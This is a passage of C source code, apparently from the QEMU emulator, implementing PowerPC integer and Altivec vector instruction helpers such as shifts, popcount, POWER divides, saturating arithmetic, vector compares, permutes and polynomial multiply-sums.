*/ uint64_t helper_darn32(void) { uint32_t ret; if (qemu_guest_getrandom(&ret, sizeof(ret)) < 0) { return -1; } return ret; } uint64_t helper_darn64(void) { uint64_t ret; if (qemu_guest_getrandom(&ret, sizeof(ret)) < 0) { return -1; } return ret; } uint64_t helper_bpermd(uint64_t rs, uint64_t rb) { int i; uint64_t ra = 0; for (i = 0; i < 8; i++) { int index = (rs >> (i * 8)) & 0xFF; if (index < 64) { if (rb & PPC_BIT(index)) { ra |= 1ULL << i; } } } return ra; } #endif target_ulong helper_cmpb(target_ulong rs, target_ulong rb) { target_ulong mask = 0xff; target_ulong ra = 0; int i; for (i = 0; i < sizeof(target_ulong); i++) { if ((rs & mask) == (rb & mask)) { ra |= mask; } mask <<= 8; } return ra; } /* shift right arithmetic helper */ target_ulong helper_sraw(CPUPPCState *env, target_ulong value, target_ulong shift) { int32_t ret; if (likely(!(shift & 0x20))) { if (likely((uint32_t)shift != 0)) { shift &= 0x1f; ret = (int32_t)value >> shift; if (likely(ret >= 0 || (value & ((1 << shift) - 1)) == 0)) { env->ca32 = env->ca = 0; } else { env->ca32 = env->ca = 1; } } else { ret = (int32_t)value; env->ca32 = env->ca = 0; } } else { ret = (int32_t)value >> 31; env->ca32 = env->ca = (ret != 0); } return (target_long)ret; } #if defined(TARGET_PPC64) target_ulong helper_srad(CPUPPCState *env, target_ulong value, target_ulong shift) { int64_t ret; if (likely(!(shift & 0x40))) { if (likely((uint64_t)shift != 0)) { shift &= 0x3f; ret = (int64_t)value >> shift; if (likely(ret >= 0 || (value & ((1ULL << shift) - 1)) == 0)) { env->ca32 = env->ca = 0; } else { env->ca32 = env->ca = 1; } } else { ret = (int64_t)value; env->ca32 = env->ca = 0; } } else { ret = (int64_t)value >> 63; env->ca32 = env->ca = (ret != 0); } return ret; } #endif #if defined(TARGET_PPC64) target_ulong helper_popcntb(target_ulong val) { /* Note that we don't fold past bytes */ val = (val & 0x5555555555555555ULL) + ((val >> 1) & 0x5555555555555555ULL); val = (val & 0x3333333333333333ULL) + ((val >> 2) & 0x3333333333333333ULL); val = (val & 0x0f0f0f0f0f0f0f0fULL) + ((val >> 4) & 0x0f0f0f0f0f0f0f0fULL); return val; } target_ulong helper_popcntw(target_ulong val) { /* Note that we don't fold past words. 
*/ val = (val & 0x5555555555555555ULL) + ((val >> 1) & 0x5555555555555555ULL); val = (val & 0x3333333333333333ULL) + ((val >> 2) & 0x3333333333333333ULL); val = (val & 0x0f0f0f0f0f0f0f0fULL) + ((val >> 4) & 0x0f0f0f0f0f0f0f0fULL); val = (val & 0x00ff00ff00ff00ffULL) + ((val >> 8) & 0x00ff00ff00ff00ffULL); val = (val & 0x0000ffff0000ffffULL) + ((val >> 16) & 0x0000ffff0000ffffULL); return val; } #else target_ulong helper_popcntb(target_ulong val) { /* Note that we don't fold past bytes */ val = (val & 0x55555555) + ((val >> 1) & 0x55555555); val = (val & 0x33333333) + ((val >> 2) & 0x33333333); val = (val & 0x0f0f0f0f) + ((val >> 4) & 0x0f0f0f0f); return val; } #endif /*****************************************************************************/ /* PowerPC 601 specific instructions (POWER bridge) */ target_ulong helper_div(CPUPPCState *env, target_ulong arg1, target_ulong arg2) { uint64_t tmp = (uint64_t)arg1 << 32 | env->spr[SPR_MQ]; if (((int32_t)tmp == INT32_MIN && (int32_t)arg2 == (int32_t)-1) || (int32_t)arg2 == 0) { env->spr[SPR_MQ] = 0; return INT32_MIN; } else { env->spr[SPR_MQ] = tmp % arg2; return tmp / (int32_t)arg2; } } target_ulong helper_divo(CPUPPCState *env, target_ulong arg1, target_ulong arg2) { uint64_t tmp = (uint64_t)arg1 << 32 | env->spr[SPR_MQ]; if (((int32_t)tmp == INT32_MIN && (int32_t)arg2 == (int32_t)-1) || (int32_t)arg2 == 0) { env->so = env->ov = 1; env->spr[SPR_MQ] = 0; return INT32_MIN; } else { env->spr[SPR_MQ] = tmp % arg2; tmp /= (int32_t)arg2; if ((int32_t)tmp != tmp) { env->so = env->ov = 1; } else { env->ov = 0; } return tmp; } } target_ulong helper_divs(CPUPPCState *env, target_ulong arg1, target_ulong arg2) { if (((int32_t)arg1 == INT32_MIN && (int32_t)arg2 == (int32_t)-1) || (int32_t)arg2 == 0) { env->spr[SPR_MQ] = 0; return INT32_MIN; } else { env->spr[SPR_MQ] = (int32_t)arg1 % (int32_t)arg2; return (int32_t)arg1 / (int32_t)arg2; } } target_ulong helper_divso(CPUPPCState *env, target_ulong arg1, target_ulong arg2) { if (((int32_t)arg1 == INT32_MIN && (int32_t)arg2 == (int32_t)-1) || (int32_t)arg2 == 0) { env->so = env->ov = 1; env->spr[SPR_MQ] = 0; return INT32_MIN; } else { env->ov = 0; env->spr[SPR_MQ] = (int32_t)arg1 % (int32_t)arg2; return (int32_t)arg1 / (int32_t)arg2; } } /*****************************************************************************/ /* 602 specific instructions */ /* mfrom is the most crazy instruction ever seen, imho ! */ /* Real implementation uses a ROM table. Do the same */ /* * Extremely decomposed: * -arg / 256 * return 256 * log10(10 + 1.0) + 0.5 */ target_ulong helper_602_mfrom(target_ulong arg) { if (likely(arg < 602)) { #include "mfrom_table.inc.c" return mfrom_ROM_table[arg]; } else { return 0; } } /*****************************************************************************/ /* Altivec extension helpers */ #if defined(HOST_WORDS_BIGENDIAN) #define VECTOR_FOR_INORDER_I(index, element) \ for (index = 0; index < ARRAY_SIZE(r->element); index++) #else #define VECTOR_FOR_INORDER_I(index, element) \ for (index = ARRAY_SIZE(r->element) - 1; index >= 0; index--) #endif /* Saturating arithmetic helpers. 
*/ #define SATCVT(from, to, from_type, to_type, min, max) \ static inline to_type cvt##from##to(from_type x, int *sat) \ { \ to_type r; \ \ if (x < (from_type)min) { \ r = min; \ *sat = 1; \ } else if (x > (from_type)max) { \ r = max; \ *sat = 1; \ } else { \ r = x; \ } \ return r; \ } #define SATCVTU(from, to, from_type, to_type, min, max) \ static inline to_type cvt##from##to(from_type x, int *sat) \ { \ to_type r; \ \ if (x > (from_type)max) { \ r = max; \ *sat = 1; \ } else { \ r = x; \ } \ return r; \ } SATCVT(sh, sb, int16_t, int8_t, INT8_MIN, INT8_MAX) SATCVT(sw, sh, int32_t, int16_t, INT16_MIN, INT16_MAX) SATCVT(sd, sw, int64_t, int32_t, INT32_MIN, INT32_MAX) SATCVTU(uh, ub, uint16_t, uint8_t, 0, UINT8_MAX) SATCVTU(uw, uh, uint32_t, uint16_t, 0, UINT16_MAX) SATCVTU(ud, uw, uint64_t, uint32_t, 0, UINT32_MAX) SATCVT(sh, ub, int16_t, uint8_t, 0, UINT8_MAX) SATCVT(sw, uh, int32_t, uint16_t, 0, UINT16_MAX) SATCVT(sd, uw, int64_t, uint32_t, 0, UINT32_MAX) #undef SATCVT #undef SATCVTU void helper_mtvscr(CPUPPCState *env, uint32_t vscr) { env->vscr = vscr & ~(1u << VSCR_SAT); /* Which bit we set is completely arbitrary, but clear the rest. */ env->vscr_sat.u64[0] = vscr & (1u << VSCR_SAT); env->vscr_sat.u64[1] = 0; set_flush_to_zero((vscr >> VSCR_NJ) & 1, &env->vec_status); } uint32_t helper_mfvscr(CPUPPCState *env) { uint32_t sat = (env->vscr_sat.u64[0] | env->vscr_sat.u64[1]) != 0; return env->vscr | (sat << VSCR_SAT); } static inline void set_vscr_sat(CPUPPCState *env) { /* The choice of non-zero value is arbitrary. */ env->vscr_sat.u32[0] = 1; } void helper_vaddcuw(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->u32); i++) { r->u32[i] = ~a->u32[i] < b->u32[i]; } } /* vprtybw */ void helper_vprtybw(ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->u32); i++) { uint64_t res = b->u32[i] ^ (b->u32[i] >> 16); res ^= res >> 8; r->u32[i] = res & 1; } } /* vprtybd */ void helper_vprtybd(ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->u64); i++) { uint64_t res = b->u64[i] ^ (b->u64[i] >> 32); res ^= res >> 16; res ^= res >> 8; r->u64[i] = res & 1; } } /* vprtybq */ void helper_vprtybq(ppc_avr_t *r, ppc_avr_t *b) { uint64_t res = b->u64[0] ^ b->u64[1]; res ^= res >> 32; res ^= res >> 16; res ^= res >> 8; r->VsrD(1) = res & 1; r->VsrD(0) = 0; } #define VARITH_DO(name, op, element) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ r->element[i] = a->element[i] op b->element[i]; \ } \ } VARITH_DO(muluwm, *, u32) #undef VARITH_DO #undef VARITH #define VARITHFP(suffix, func) \ void helper_v##suffix(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, \ ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ r->f32[i] = func(a->f32[i], b->f32[i], &env->vec_status); \ } \ } VARITHFP(addfp, float32_add) VARITHFP(subfp, float32_sub) VARITHFP(minfp, float32_min) VARITHFP(maxfp, float32_max) #undef VARITHFP #define VARITHFPFMA(suffix, type) \ void helper_v##suffix(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, \ ppc_avr_t *b, ppc_avr_t *c) \ { \ int i; \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ r->f32[i] = float32_muladd(a->f32[i], c->f32[i], b->f32[i], \ type, &env->vec_status); \ } \ } VARITHFPFMA(maddfp, 0); VARITHFPFMA(nmsubfp, float_muladd_negate_result | float_muladd_negate_c); #undef VARITHFPFMA #define VARITHSAT_CASE(type, op, cvt, element) \ { \ type result = (type)a->element[i] op (type)b->element[i]; \ r->element[i] = cvt(result, 
&sat); \ } #define VARITHSAT_DO(name, op, optype, cvt, element) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *vscr_sat, \ ppc_avr_t *a, ppc_avr_t *b, uint32_t desc) \ { \ int sat = 0; \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ VARITHSAT_CASE(optype, op, cvt, element); \ } \ if (sat) { \ vscr_sat->u32[0] = 1; \ } \ } #define VARITHSAT_SIGNED(suffix, element, optype, cvt) \ VARITHSAT_DO(adds##suffix##s, +, optype, cvt, element) \ VARITHSAT_DO(subs##suffix##s, -, optype, cvt, element) #define VARITHSAT_UNSIGNED(suffix, element, optype, cvt) \ VARITHSAT_DO(addu##suffix##s, +, optype, cvt, element) \ VARITHSAT_DO(subu##suffix##s, -, optype, cvt, element) VARITHSAT_SIGNED(b, s8, int16_t, cvtshsb) VARITHSAT_SIGNED(h, s16, int32_t, cvtswsh) VARITHSAT_SIGNED(w, s32, int64_t, cvtsdsw) VARITHSAT_UNSIGNED(b, u8, uint16_t, cvtshub) VARITHSAT_UNSIGNED(h, u16, uint32_t, cvtswuh) VARITHSAT_UNSIGNED(w, u32, uint64_t, cvtsduw) #undef VARITHSAT_CASE #undef VARITHSAT_DO #undef VARITHSAT_SIGNED #undef VARITHSAT_UNSIGNED #define VAVG_DO(name, element, etype) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ etype x = (etype)a->element[i] + (etype)b->element[i] + 1; \ r->element[i] = x >> 1; \ } \ } #define VAVG(type, signed_element, signed_type, unsigned_element, \ unsigned_type) \ VAVG_DO(avgs##type, signed_element, signed_type) \ VAVG_DO(avgu##type, unsigned_element, unsigned_type) VAVG(b, s8, int16_t, u8, uint16_t) VAVG(h, s16, int32_t, u16, uint32_t) VAVG(w, s32, int64_t, u32, uint64_t) #undef VAVG_DO #undef VAVG #define VABSDU_DO(name, element) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ r->element[i] = (a->element[i] > b->element[i]) ? \ (a->element[i] - b->element[i]) : \ (b->element[i] - a->element[i]); \ } \ } /* * VABSDU - Vector absolute difference unsigned * name - instruction mnemonic suffix (b: byte, h: halfword, w: word) * element - element type to access from vector */ #define VABSDU(type, element) \ VABSDU_DO(absdu##type, element) VABSDU(b, u8) VABSDU(h, u16) VABSDU(w, u32) #undef VABSDU_DO #undef VABSDU #define VCF(suffix, cvt, element) \ void helper_vcf##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *b, uint32_t uim) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ float32 t = cvt(b->element[i], &env->vec_status); \ r->f32[i] = float32_scalbn(t, 0 - uim, &env->vec_status); \ } \ } VCF(ux, uint32_to_float32, u32) VCF(sx, int32_to_float32, s32) #undef VCF #define VCMP_DO(suffix, compare, element, record) \ void helper_vcmp##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *a, ppc_avr_t *b) \ { \ uint64_t ones = (uint64_t)-1; \ uint64_t all = ones; \ uint64_t none = 0; \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ uint64_t result = (a->element[i] compare b->element[i] ? 
\ ones : 0x0); \ switch (sizeof(a->element[0])) { \ case 8: \ r->u64[i] = result; \ break; \ case 4: \ r->u32[i] = result; \ break; \ case 2: \ r->u16[i] = result; \ break; \ case 1: \ r->u8[i] = result; \ break; \ } \ all &= result; \ none |= result; \ } \ if (record) { \ env->crf[6] = ((all != 0) << 3) | ((none == 0) << 1); \ } \ } #define VCMP(suffix, compare, element) \ VCMP_DO(suffix, compare, element, 0) \ VCMP_DO(suffix##_dot, compare, element, 1) VCMP(equb, ==, u8) VCMP(equh, ==, u16) VCMP(equw, ==, u32) VCMP(equd, ==, u64) VCMP(gtub, >, u8) VCMP(gtuh, >, u16) VCMP(gtuw, >, u32) VCMP(gtud, >, u64) VCMP(gtsb, >, s8) VCMP(gtsh, >, s16) VCMP(gtsw, >, s32) VCMP(gtsd, >, s64) #undef VCMP_DO #undef VCMP #define VCMPNE_DO(suffix, element, etype, cmpzero, record) \ void helper_vcmpne##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *a, ppc_avr_t *b) \ { \ etype ones = (etype)-1; \ etype all = ones; \ etype result, none = 0; \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ if (cmpzero) { \ result = ((a->element[i] == 0) \ || (b->element[i] == 0) \ || (a->element[i] != b->element[i]) ? \ ones : 0x0); \ } else { \ result = (a->element[i] != b->element[i]) ? ones : 0x0; \ } \ r->element[i] = result; \ all &= result; \ none |= result; \ } \ if (record) { \ env->crf[6] = ((all != 0) << 3) | ((none == 0) << 1); \ } \ } /* * VCMPNEZ - Vector compare not equal to zero * suffix - instruction mnemonic suffix (b: byte, h: halfword, w: word) * element - element type to access from vector */ #define VCMPNE(suffix, element, etype, cmpzero) \ VCMPNE_DO(suffix, element, etype, cmpzero, 0) \ VCMPNE_DO(suffix##_dot, element, etype, cmpzero, 1) VCMPNE(zb, u8, uint8_t, 1) VCMPNE(zh, u16, uint16_t, 1) VCMPNE(zw, u32, uint32_t, 1) VCMPNE(b, u8, uint8_t, 0) VCMPNE(h, u16, uint16_t, 0) VCMPNE(w, u32, uint32_t, 0) #undef VCMPNE_DO #undef VCMPNE #define VCMPFP_DO(suffix, compare, order, record) \ void helper_vcmp##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *a, ppc_avr_t *b) \ { \ uint32_t ones = (uint32_t)-1; \ uint32_t all = ones; \ uint32_t none = 0; \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ uint32_t result; \ int rel = float32_compare_quiet(a->f32[i], b->f32[i], \ &env->vec_status); \ if (rel == float_relation_unordered) { \ result = 0; \ } else if (rel compare order) { \ result = ones; \ } else { \ result = 0; \ } \ r->u32[i] = result; \ all &= result; \ none |= result; \ } \ if (record) { \ env->crf[6] = ((all != 0) << 3) | ((none == 0) << 1); \ } \ } #define VCMPFP(suffix, compare, order) \ VCMPFP_DO(suffix, compare, order, 0) \ VCMPFP_DO(suffix##_dot, compare, order, 1) VCMPFP(eqfp, ==, float_relation_equal) VCMPFP(gefp, !=, float_relation_less) VCMPFP(gtfp, ==, float_relation_greater) #undef VCMPFP_DO #undef VCMPFP static inline void vcmpbfp_internal(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, int record) { int i; int all_in = 0; for (i = 0; i < ARRAY_SIZE(r->f32); i++) { int le_rel = float32_compare_quiet(a->f32[i], b->f32[i], &env->vec_status); if (le_rel == float_relation_unordered) { r->u32[i] = 0xc0000000; all_in = 1; } else { float32 bneg = float32_chs(b->f32[i]); int ge_rel = float32_compare_quiet(a->f32[i], bneg, &env->vec_status); int le = le_rel != float_relation_greater; int ge = ge_rel != float_relation_less; r->u32[i] = ((!le) << 31) | ((!ge) << 30); all_in |= (!le | !ge); } } if (record) { env->crf[6] = (all_in == 0) << 1; } } void helper_vcmpbfp(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { vcmpbfp_internal(env, r, a, b, 
0); } void helper_vcmpbfp_dot(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { vcmpbfp_internal(env, r, a, b, 1); } #define VCT(suffix, satcvt, element) \ void helper_vct##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *b, uint32_t uim) \ { \ int i; \ int sat = 0; \ float_status s = env->vec_status; \ \ set_float_rounding_mode(float_round_to_zero, &s); \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ if (float32_is_any_nan(b->f32[i])) { \ r->element[i] = 0; \ } else { \ float64 t = float32_to_float64(b->f32[i], &s); \ int64_t j; \ \ t = float64_scalbn(t, uim, &s); \ j = float64_to_int64(t, &s); \ r->element[i] = satcvt(j, &sat); \ } \ } \ if (sat) { \ set_vscr_sat(env); \ } \ } VCT(uxs, cvtsduw, u32) VCT(sxs, cvtsdsw, s32) #undef VCT target_ulong helper_vclzlsbb(ppc_avr_t *r) { target_ulong count = 0; int i; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { if (r->VsrB(i) & 0x01) { break; } count++; } return count; } target_ulong helper_vctzlsbb(ppc_avr_t *r) { target_ulong count = 0; int i; for (i = ARRAY_SIZE(r->u8) - 1; i >= 0; i--) { if (r->VsrB(i) & 0x01) { break; } count++; } return count; } void helper_vmhaddshs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int sat = 0; int i; for (i = 0; i < ARRAY_SIZE(r->s16); i++) { int32_t prod = a->s16[i] * b->s16[i]; int32_t t = (int32_t)c->s16[i] + (prod >> 15); r->s16[i] = cvtswsh(t, &sat); } if (sat) { set_vscr_sat(env); } } void helper_vmhraddshs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int sat = 0; int i; for (i = 0; i < ARRAY_SIZE(r->s16); i++) { int32_t prod = a->s16[i] * b->s16[i] + 0x00004000; int32_t t = (int32_t)c->s16[i] + (prod >> 15); r->s16[i] = cvtswsh(t, &sat); } if (sat) { set_vscr_sat(env); } } void helper_vmladduhm(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int i; for (i = 0; i < ARRAY_SIZE(r->s16); i++) { int32_t prod = a->s16[i] * b->s16[i]; r->s16[i] = (int16_t) (prod + c->s16[i]); } } #define VMRG_DO(name, element, access, ofs) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ ppc_avr_t result; \ int i, half = ARRAY_SIZE(r->element) / 2; \ \ for (i = 0; i < half; i++) { \ result.access(i * 2 + 0) = a->access(i + ofs); \ result.access(i * 2 + 1) = b->access(i + ofs); \ } \ *r = result; \ } #define VMRG(suffix, element, access) \ VMRG_DO(mrgl##suffix, element, access, half) \ VMRG_DO(mrgh##suffix, element, access, 0) VMRG(b, u8, VsrB) VMRG(h, u16, VsrH) VMRG(w, u32, VsrW) #undef VMRG_DO #undef VMRG void helper_vmsummbm(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int32_t prod[16]; int i; for (i = 0; i < ARRAY_SIZE(r->s8); i++) { prod[i] = (int32_t)a->s8[i] * b->u8[i]; } VECTOR_FOR_INORDER_I(i, s32) { r->s32[i] = c->s32[i] + prod[4 * i] + prod[4 * i + 1] + prod[4 * i + 2] + prod[4 * i + 3]; } } void helper_vmsumshm(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int32_t prod[8]; int i; for (i = 0; i < ARRAY_SIZE(r->s16); i++) { prod[i] = a->s16[i] * b->s16[i]; } VECTOR_FOR_INORDER_I(i, s32) { r->s32[i] = c->s32[i] + prod[2 * i] + prod[2 * i + 1]; } } void helper_vmsumshs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { int32_t prod[8]; int i; int sat = 0; for (i = 0; i < ARRAY_SIZE(r->s16); i++) { prod[i] = (int32_t)a->s16[i] * b->s16[i]; } VECTOR_FOR_INORDER_I(i, s32) { int64_t t = (int64_t)c->s32[i] + prod[2 * i] + prod[2 * i + 1]; r->u32[i] = cvtsdsw(t, &sat); } if (sat) { set_vscr_sat(env); } } void helper_vmsumubm(CPUPPCState 
*env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { uint16_t prod[16]; int i; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { prod[i] = a->u8[i] * b->u8[i]; } VECTOR_FOR_INORDER_I(i, u32) { r->u32[i] = c->u32[i] + prod[4 * i] + prod[4 * i + 1] + prod[4 * i + 2] + prod[4 * i + 3]; } } void helper_vmsumuhm(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { uint32_t prod[8]; int i; for (i = 0; i < ARRAY_SIZE(r->u16); i++) { prod[i] = a->u16[i] * b->u16[i]; } VECTOR_FOR_INORDER_I(i, u32) { r->u32[i] = c->u32[i] + prod[2 * i] + prod[2 * i + 1]; } } void helper_vmsumuhs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { uint32_t prod[8]; int i; int sat = 0; for (i = 0; i < ARRAY_SIZE(r->u16); i++) { prod[i] = a->u16[i] * b->u16[i]; } VECTOR_FOR_INORDER_I(i, s32) { uint64_t t = (uint64_t)c->u32[i] + prod[2 * i] + prod[2 * i + 1]; r->u32[i] = cvtuduw(t, &sat); } if (sat) { set_vscr_sat(env); } } #define VMUL_DO_EVN(name, mul_element, mul_access, prod_access, cast) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->mul_element); i += 2) { \ r->prod_access(i >> 1) = (cast)a->mul_access(i) * \ (cast)b->mul_access(i); \ } \ } #define VMUL_DO_ODD(name, mul_element, mul_access, prod_access, cast) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->mul_element); i += 2) { \ r->prod_access(i >> 1) = (cast)a->mul_access(i + 1) * \ (cast)b->mul_access(i + 1); \ } \ } #define VMUL(suffix, mul_element, mul_access, prod_access, cast) \ VMUL_DO_EVN(mule##suffix, mul_element, mul_access, prod_access, cast) \ VMUL_DO_ODD(mulo##suffix, mul_element, mul_access, prod_access, cast) VMUL(sb, s8, VsrSB, VsrSH, int16_t) VMUL(sh, s16, VsrSH, VsrSW, int32_t) VMUL(sw, s32, VsrSW, VsrSD, int64_t) VMUL(ub, u8, VsrB, VsrH, uint16_t) VMUL(uh, u16, VsrH, VsrW, uint32_t) VMUL(uw, u32, VsrW, VsrD, uint64_t) #undef VMUL_DO_EVN #undef VMUL_DO_ODD #undef VMUL void helper_vperm(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { ppc_avr_t result; int i; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { int s = c->VsrB(i) & 0x1f; int index = s & 0xf; if (s & 0x10) { result.VsrB(i) = b->VsrB(index); } else { result.VsrB(i) = a->VsrB(index); } } *r = result; } void helper_vpermr(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { ppc_avr_t result; int i; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { int s = c->VsrB(i) & 0x1f; int index = 15 - (s & 0xf); if (s & 0x10) { result.VsrB(i) = a->VsrB(index); } else { result.VsrB(i) = b->VsrB(index); } } *r = result; } #if defined(HOST_WORDS_BIGENDIAN) #define VBPERMQ_INDEX(avr, i) ((avr)->u8[(i)]) #define VBPERMD_INDEX(i) (i) #define VBPERMQ_DW(index) (((index) & 0x40) != 0) #define EXTRACT_BIT(avr, i, index) (extract64((avr)->u64[i], index, 1)) #else #define VBPERMQ_INDEX(avr, i) ((avr)->u8[15 - (i)]) #define VBPERMD_INDEX(i) (1 - i) #define VBPERMQ_DW(index) (((index) & 0x40) == 0) #define EXTRACT_BIT(avr, i, index) \ (extract64((avr)->u64[1 - i], 63 - index, 1)) #endif void helper_vbpermd(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i, j; ppc_avr_t result = { .u64 = { 0, 0 } }; VECTOR_FOR_INORDER_I(i, u64) { for (j = 0; j < 8; j++) { int index = VBPERMQ_INDEX(b, (i * 8) + j); if (index < 64 && EXTRACT_BIT(a, i, index)) { result.u64[VBPERMD_INDEX(i)] |= (0x80 >> j); } } } *r = result; } void helper_vbpermq(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i; uint64_t perm = 0; 
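    /*
     * Added commentary (not in the original source): each of the 16
     * selector bytes of b names one bit 0..127 of a in IBM numbering
     * (bit 0 = MSB). Selected bits are gathered MSB-first into the low
     * 16 bits of perm, so b = {0, 1, ..., 15} copies the 16 most
     * significant bits of a into bits 48..63 of the result.
     */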
VECTOR_FOR_INORDER_I(i, u8) { int index = VBPERMQ_INDEX(b, i); if (index < 128) { uint64_t mask = (1ull << (63 - (index & 0x3F))); if (a->u64[VBPERMQ_DW(index)] & mask) { perm |= (0x8000 >> i); } } } r->VsrD(0) = perm; r->VsrD(1) = 0; } #undef VBPERMQ_INDEX #undef VBPERMQ_DW #define PMSUM(name, srcfld, trgfld, trgtyp) \ void helper_##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i, j; \ trgtyp prod[sizeof(ppc_avr_t) / sizeof(a->srcfld[0])]; \ \ VECTOR_FOR_INORDER_I(i, srcfld) { \ prod[i] = 0; \ for (j = 0; j < sizeof(a->srcfld[0]) * 8; j++) { \ if (a->srcfld[i] & (1ull << j)) { \ prod[i] ^= ((trgtyp)b->srcfld[i] << j); \ } \ } \ } \ \ VECTOR_FOR_INORDER_I(i, trgfld) { \ r->trgfld[i] = prod[2 * i] ^ prod[2 * i + 1]; \ } \ } PMSUM(vpmsumb, u8, u16, uint16_t) PMSUM(vpmsumh, u16, u32, uint32_t) PMSUM(vpmsumw, u32, u64, uint64_t) void helper_vpmsumd(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { #ifdef CONFIG_INT128 int i, j; __uint128_t prod[2]; VECTOR_FOR_INORDER_I(i, u64) { prod[i] = 0; for (j = 0; j < 64; j++) { if (a->u64[i] & (1ull << j)) { prod[i] ^= (((__uint128_t)b->u64[i]) << j); } } } r->u128 = prod[0] ^ prod[1]; #else int i, j; ppc_avr_t prod[2]; VECTOR_FOR_INORDER_I(i, u64) { prod[i].VsrD(1) = prod[i].VsrD(0) = 0; for (j = 0; j < 64; j++) { if (a->u64[i] & (1ull << j)) { ppc_avr_t bshift; if (j == 0) { bshift.VsrD(0) = 0; bshift.VsrD(1) = b->u64[i]; } else { bshift.VsrD(0) = b->u64[i] >> (64 - j); bshift.VsrD(1) = b->u64[i] << j; } prod[i].VsrD(1) ^= bshift.VsrD(1); prod[i].VsrD(0) ^= bshift.VsrD(0); } } } r->VsrD(1) = prod[0].VsrD(1) ^ prod[1].VsrD(1); r->VsrD(0) = prod[0].VsrD(0) ^ prod[1].VsrD(0); #endif } #if defined(HOST_WORDS_BIGENDIAN) #define PKBIG 1 #else #define PKBIG 0 #endif void helper_vpkpx(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i, j; ppc_avr_t result; #if defined(HOST_WORDS_BIGENDIAN) const ppc_avr_t *x[2] = { a, b }; #else const ppc_avr_t *x[2] = { b, a }; #endif VECTOR_FOR_INORDER_I(i, u64) { VECTOR_FOR_INORDER_I(j, u32) { uint32_t e = x[i]->u32[j]; result.u16[4 * i + j] = (((e >> 9) & 0xfc00) | ((e >> 6) & 0x3e0) | ((e >> 3) & 0x1f)); } } *r = result; } #define VPK(suffix, from, to, cvt, dosat) \ void helper_vpk##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ int sat = 0; \ ppc_avr_t result; \ ppc_avr_t *a0 = PKBIG ? a : b; \ ppc_avr_t *a1 = PKBIG ? 
